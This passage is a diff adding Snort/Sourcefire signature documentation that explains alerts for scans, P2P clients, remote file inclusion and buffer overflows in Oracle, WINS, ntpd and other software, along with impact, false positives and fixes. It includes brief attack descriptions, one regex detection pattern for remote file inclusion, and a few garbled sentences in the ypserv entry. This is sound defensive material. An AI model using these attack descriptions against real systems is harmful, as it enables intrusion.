+Then the attacker might find out that the FTP service is vulnerable to a
+particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other 
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2587.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2587
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. 
+This may be against corporate policy. p2p clients connect to other p2p 
+clients to share files, commonly music and video files but can be configured 
+to share any file on the local machine. In particular this event is
+generated when the p2p client eDonkey is used.
+
+This activity may not only use bandwidth but may also be used to transfer 
+company confidential information to unauthorized hosts external to the 
+protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using an eDonkey p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2411.txt
@@ -0,0 +1,66 @@
+Rule:  
+
+--
+Sid:
+2411
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in RealNetworks Helix Media Server.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+Versions of RealNetworks Helix Media Server and RealSystem Server are
+vulnerable to a buffer overflow condition that may present the attacker
+with the opportunity to execute code of their choosing on the target
+system.
+
+This may then present the attacker with the opportunity to gain a remote
+root shell, thus compromising the system.
+
+--
+Affected Systems:
+	 Helix Universal Server 9.01, versions 9.0.2.794 and earlier
+	  RealSystem Server 8.0 & 7.0
+
+--
+Attack Scenarios:
+The attacker may probe for the existence of an affected server and then
+use one of the publicly available scripts to exploit the service.
+
+--
+Ease of Attack:
+Simple. Exploits exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+RealNetworks
+http://www.service.real.com/help/faq/security/rootexploit091103.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000589.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000589
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "db_import.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "db_import.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2034.txt
@@ -0,0 +1,85 @@
+Rule:
+
+--
+Sid:
+2034
+
+--
+Summary:
+A request has been made to rpc.ypserv from an external source that 
+should not have access to this service. This may be indicative of an 
+intelligence gathering activity as a prelude to a more serious 
+compromise of system resources.
+
+service against the target host.
+
+--
+Impact:
+Disclosure of sensitive system information to an unauthorized user. 
+Possible denial of service.
+
+--
+Detailed Information:
+The rpc.ypserv daemon queries information in the local NIS maps. A 
+response to this query may divulge important information to the user 
+performing the query. This could lead to futher exploitation of 
+resources on the network.
+
+In addition, a vulnerability exists in ypserv on some Linux platforms 
+that could lead to a buffer overflow and root compromise of the target 
+host. This is achieved by making a multitude of requests for a NIS map 
+that does not exist.
+
+--
+Affected Systems:
+Multiple systems running versions of ypserv prior to 2.5.
+
+--
+Attack Scenarios:
+The attacker can craft a malicious request to rpc.ypserv such that 
+valuable information can be returned to the attacker.
+
+In the case of a buffer overflow, the attacker might issue a large 
+therefore, be seen many times.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+Upgrade ypserv to the latest version.
+
+Use /var/yp/securenets to list the hosts allowed to access this resource
+where appropriate.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6016
+http://www.securityfocus.com/bid/5914
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1232
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1043
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1042
+
+--
--- /dev/null
+++ b/doc/signatures/1689.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1689
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2307.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2307
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PayPal Storefront PHP web application running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code of the attackers choosing.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PayPal Storefront PHP web application running 
+on a server. It may be possible for an attacker to include code of their
+choosing from a source external to the server running the application.
+This code will execute with the privileges of the user running the web
+server.
+
+The vulnerability exists due to inadequate verification of include file
+locations in the application.
+
+--
+Affected Systems:
+	PayPal Store Front 3.0, others may also be affected.
+
+--
+Attack Scenarios:
+An attacker might include their code by including the URI to the script
+in the HTTP GET parameters when calling index.php.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+The content/pcre criteria: "content:"page="; pcre:"/page=(http|https|ftp)/i"; 
+Are met frequently by the strings "page=http" and "lastpage=http" which 
+occur relatively often in the text of cookies, most commonly ones associated 
+with MSN passport.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+False positive information contributed by Alan Whinery <whinery@hawaii.edu>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2694.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2694
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure verify_queue_types_get_nrp
+. This procedure is included in
+sys.dbms_aqadm.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2632.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2632
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "refresh_mview_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gowner" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck90.html
+
+--
--- /dev/null
+++ b/doc/signatures/3458.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+3458
+
+--
+Summary:
+This event is generated when an attempt is made to exploit
+a buffer overflow associated with the Arkeia Client Backup
+server.
+
+--
+Impact:
+A successful attack may cause a buffer overflow and the
+subsequent execution of arbitrary code at the privilege
+level of the vulnerable service.
+
+--
+Detailed Information:
+A vulnerability exists in the Arkeia Client Backup server
+software for a type 84 request. This may cause a buffer
+overflow and the subsequent execution of arbitrary code
+on a vulnerable server. The vulnerability is caused by
+an overly long message length.
+
+--
+Affected Systems:
+	Arkeia version 5.3 and prior.
+
+--
+Attack Scenarios:
+An attacker craft a malicious type 84 request and send
+it to a vulnerable server.
+
+--
+Ease of Attack:
+Simple.  Exploits are publicly available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+There can be multiple messages in one transfer. The event is generated
+on the first message only.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Metasploit:
+http://metasploit.com/research/arkeia_agent
+
+--
--- /dev/null
+++ b/doc/signatures/1538.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1538
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Cassandra NNTP server.
+
+--
+Impact:
+Denial of Service (DoS) 
+
+--
+Detailed Information:
+A vulnerability exists in the Cassandra NNTP server for Windows such
+that an unusually long login name will cause a DoS condition to occur.
+This is due to an unchecked buffer in the code that handles login
+attempts. A login name that exceeds 10 000 characters will trigger the
+overflow.
+
+--
+Affected Systems:
+	Atrium Software Cassandra NNTP Server 1.10
+
+--
+Attack Scenarios:
+An attacker needs to supply a login username containing 10 000 or more
+characters to cause the DoS.
+
+--
+Ease of Attack:
+Simple. No exploit software is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1156
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0341
+
+--
--- /dev/null
+++ b/doc/signatures/949.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+949
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1131.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1131
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1221.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1221
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3199.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3199
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft WINS.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft WINS such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker would need to send multiple malformed request to the WINS
+service running on a host.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Uninstall the WINS service.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000643.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000643
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_rename.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_rename.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/424.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+424
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Mobile Registration Request datagram with an undefined ICMP Code.
+
+--
+
+Impact:
+ICMP Mobile Registration Requests were never implemented and have been replaced by UDP and TCP versions of the message.  ICMP Type 35 datagrams should never be seen in normal network conditions.
+
+--
+
+Detailed Information:
+ICMP Mobile Registration Request datagrams were developed before the development of RFC3344 (IP Mobility Support for IPv4).  Therefore these types of ICMP datagrams should never be seen in normal networking conditions.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 35 datagrams are not normal network activity.  Hosts generating these types of datagrams should be investigated for nefarious activity
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/3001.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+3001
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
--- /dev/null
+++ b/doc/signatures/630.txt
@@ -0,0 +1,51 @@
+Rule: 
+
+-- 
+Sid:630
+
+-- 
+Summary:
+A host has scanned the network looking for vulnerable servers.
+
+-- 
+Impact:
+Information leak, reconnaisance, preperation for automated attack such as worm propagation
+
+
+-- 
+Detailed Information: 
+Synscan is the scanning and vulnerability testing engines for ramen, canserserver and is included in some versions of the t0rn root kit as t0rnscan. It is a very fast syn scanner. 
+
+-- 
+Attack Scenarios: 
+This is a scanning tool that is often the precursor to a worm infection.
+
+
+-- 
+Ease of Attack: 
+This scanner is fast and easy to use. It is readily available and was included with several worms.
+
+
+-- 
+False Positives: 
+sscan, mscan, and several other tools used ID=39426 but the use of SYNFIN is unique to synscan [1.5|1.6]
+
+-- 
+False Negatives: 
+This rule will not generate an event if recent versions of synScan, such as 1.6a, are used because synScan now uses random IP IDs.
+
+-- 
+Corrective Action: 
+Run flexresp with synscan kill.
+
+-- 
+Contributors: 
+Don Smith	Initial Research
+Josh Gray	Edits
+
+-- 
+Additional References:
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/1218.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1218
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1597.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1597
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/312.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid: 312
+
+--
+Summary:
+This event is generated when an attempt to exploit a buffer overflow condition in ntpd is made.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to gain remote access to the victim host or execute arbitrary code with the privileges of the superuser account.
+
+--
+Detailed Information:
+Some versions of the Network Time Protocol Daemon (ntpd) are vulnerable to a buffer overflow condition which can present the attacker with a root shell.
+
+Ntp is used to synchronize system time with a time server. This may also be used on various network devices.
+
+Affected Versions:
+	ntpd versions prior to an including 4.0.99k
+	xntpd and xntp3
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0414
+
+Bugtraq:
+http://www.securityfocus.com/bid/2540
+
+--
--- /dev/null
+++ b/doc/signatures/1478.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1478
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
